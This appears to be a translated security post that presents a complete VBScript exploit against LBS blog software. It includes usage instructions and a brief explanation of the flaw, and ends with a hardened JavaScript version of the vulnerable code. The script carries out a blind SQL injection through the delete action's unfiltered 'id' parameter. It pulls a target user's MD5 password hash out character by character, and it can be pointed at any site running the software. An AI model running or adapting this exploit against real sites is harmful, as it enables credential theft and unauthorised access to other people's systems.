It just proves that the vulnerability exists.
The exploit is as follows. Save it as a .vbs file and test it yourself against the program shown below.
'From Jianxin
'============================================================================================
'Usage instructions:
'At the command prompt:
'Cscript.exe lbsblog.vbs <blog path of the target site> <valid article id> <user id of the blog user whose password is to be cracked>
'For example:
'Cscript.exe lbsblog.vbs www.xxxx.com/blog/ 1 1
'By loveshell
'============================================================================================
On Error Resume Next
Dim oArgs
Dim olbsXML           'XMLHTTP object used to open the target URL
Dim TargetURL         'target URL
Dim userid, articleid 'blog user id and a valid article id
Dim TempStr           'stores the MD5 password characters obtained so far
Dim CharHex           'the hexadecimal character set
Dim charset
Set oArgs = WScript.Arguments
If oArgs.Count < 3 Then Call ShowUsage()
Set olbsXML = CreateObject("Microsoft.XMLHTTP")
'Fill in the complete target URL
TargetURL = oArgs(0)
If LCase(Left(TargetURL, 7)) <> "http://" Then TargetURL = "http://" & TargetURL
If Right(TargetURL, 1) <> "/" Then TargetURL = TargetURL & "/"
TargetURL = TargetURL & "article.asp"
articleid = oArgs(1)
userid = oArgs(2)
TempStr = ""
CharHex = Split("0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f", ",")
WScript.Echo "LBS blog All version Exploit" & vbCrLf
WScript.Echo "By Jianxin" & vbCrLf
WScript.Echo "http://www.loveshell.net/Just For fun :)" & vbCrLf
WScript.Echo "+ Fuck the site now" & vbCrLf
Call main(TargetURL, BlogName)
Set olbsXML = Nothing
'---------------------------------------------- Sub -------------------------------------------------------
'=====================================================
'Function name: main
'Purpose: main program, injection to obtain the password of the blog user
'=====================================================
Sub main(TargetURL, BlogName)
    Dim MainOffset, SubOffset, TempLen, OpenURL, GetPage, Postdata
    'Guess the 32-character MD5 hash one hex character at a time
    For MainOffset = 1 To 40
        For SubOffset = 0 To 15
            TempLen = 0
            Postdata = ""
            Postdata = articleid & " and (select left(user_password," & MainOffset & ") from blog_user where user_id=" & userid & ")='" & TempStr & CharHex(SubOffset) & "'"
            OpenURL = TargetURL
            olbsXML.Open "POST", OpenURL, False, "", ""
            olbsXML.setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
            olbsXML.Send "act=delete&id=" & Escape(Postdata)
            GetPage = BytesToBstr(olbsXML.ResponseBody)
            'Determine which page came back
            If InStr(GetPage, "deleted") <> 0 Then
                '"The blog user does not exist or the entered information is incorrect" is the error mark.
                'If this mark is returned, the guessed MD5 character is wrong.
                'If you only ever get an MD5 value of 0000000000000000, change the error mark.
            ElseIf InStr(GetPage, "permission") <> 0 Then
                TempStr = TempStr & CharHex(SubOffset)
                WScript.Echo "+ Crack now:" & TempStr
                Exit For
            Else
                WScript.Echo vbCrLf & "Something error" & vbCrLf
                WScript.Echo vbCrLf & GetPage & vbCrLf
                WScript.Quit
            End If
        Next
    Next
    WScript.Echo vbCrLf & "+ We Got It:" & TempStr & vbCrLf & ":P Don't Be edevil"
End Sub
'=====================================================
'Function name: BytesToBstr
'Purpose: convert the raw body of the XMLHTTP response to a GB2312-decoded string
'=====================================================
Function BytesToBstr(body)
    Dim objstream
    Set objstream = CreateObject("ADODB.Stream")
    objstream.Type = 1 'binary
    objstream.Mode = 3 'read/write
    objstream.Open
    objstream.Write body
    objstream.Position = 0
    objstream.Type = 2 'text
    objstream.Charset = "GB2312"
    BytesToBstr = objstream.ReadText
    objstream.Close
    Set objstream = Nothing
End Function
'==================================
'Function name: ShowUsage
'Purpose: usage tips
'==================================
Sub ShowUsage()
    WScript.Echo "LBS blog Exploit" & vbCrLf & "By Loveshell/Jianxin"
    WScript.Echo "Usage:" & vbCrLf & "CScript " & WScript.ScriptFullName & " TargetURL ArticleId UserId"
    WScript.Echo "Example:" & vbCrLf & "CScript " & WScript.ScriptFullName & " http://www.loveshell.net/ 1 1"
    WScript.Echo ""
    WScript.Quit
End Sub
Vulnerability description:
In src_article.asp:
......
input["log_id"] = func.checkInt(input["log_id"]);
if (!input["id"]) {
    strError = lang["invalid_parameter"];
} else {
    // Check if the article exists
    theArticle.load("log_id, log_authorID, log_catID", "log_id=" + input["id"]);
    strError = false;
}
......
log_id is filtered, but it is id that actually gets used :)
What happens then?
Code in class/article.asp:
this.load = function(strSelect, strWhere) {
    var tmpA = connBlog.query("SELECT TOP 1 " + strSelect + " FROM [blog_Article] WHERE " + strWhere);
    if (tmpA) {
        this.fill(tmpA[0]);
        return true;
    } else {
        return false;
    }
}
No need for me to spell it out, heh, but triggering it requires a condition to hold. Can it be met?
function articleDelete() {
    if (theUser.rights["delete"] < 1) {
        // Check user right - without DB query
        pageHeader(lang["error"]);
        redirectMessage(lang["error"], lang["no_rights"], lang["goback"], "javascript:window.history.back();", false, "errorbox");
    } else {
        var theArticle = new lbsArticle();
        var strError;
By default, all guest users have the delete right. Although a further check is performed later, the injected query has already executed by then, and that later check is exactly what supplies the true/false signal the injection relies on.
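The unsafe id handling from src_article.asp beside a hardened version, as an added example that is not part of the LBS blog code base: the fixed version validates the id it actually puts into SQL and performs the rights check before any query runs. `checkInt` and `connBlog.query` are assumed stand-ins for the project's `func.checkInt` and database helpers, and the inputs are constructed.

```javascript
// Added example, not the LBS blog code: the src_article.asp pattern beside a
// hardened version. checkInt and connBlog are assumed stand-ins for the real
// func.checkInt and connBlog.query helpers.
const queries = []; // every SQL string handed to the fake DB layer

// Assumed stand-in for func.checkInt: accepts only a canonical decimal integer;
// anything else (including "1 or 1=1") collapses to "0".
function checkInt(v) {
  return /^\d+$/.test(String(v)) ? String(parseInt(v, 10)) : "0";
}

// Fake connBlog.query: records the SQL it receives and pretends one row matched.
const connBlog = { query(sql) { queries.push(sql); return [{ log_id: 1 }]; } };
function lastQuery() { return queries[queries.length - 1]; }

// Vulnerable: log_id is validated, but the WHERE clause is built from the raw id.
function loadArticleVulnerable(input) {
  input["log_id"] = checkInt(input["log_id"]);
  if (!input["id"]) return false;
  const where = "log_id=" + input["id"];
  return connBlog.query("SELECT TOP 1 log_id FROM [blog_Article] WHERE " + where).length > 0;
}

// Hardened: the value that reaches SQL is the validated one, and an invalid id
// is rejected before the database is touched at all.
function loadArticleFixed(input) {
  const id = checkInt(input["id"]);
  if (id === "0") return false;
  return connBlog.query("SELECT TOP 1 log_id FROM [blog_Article] WHERE log_id=" + id).length > 0;
}

// Hardened delete handler: authorisation first, input validation second,
// database access last, so an unauthorised request never reaches the query
// and cannot be used as a true/false oracle.
function articleDeleteFixed(user, input) {
  if (!user.rights || !(user.rights["delete"] >= 1)) return "no_rights";
  const id = checkInt(input["id"]);
  if (id === "0") return "invalid_parameter";
  return loadArticleFixed({ id }) ? "deleted" : "not_found";
}
```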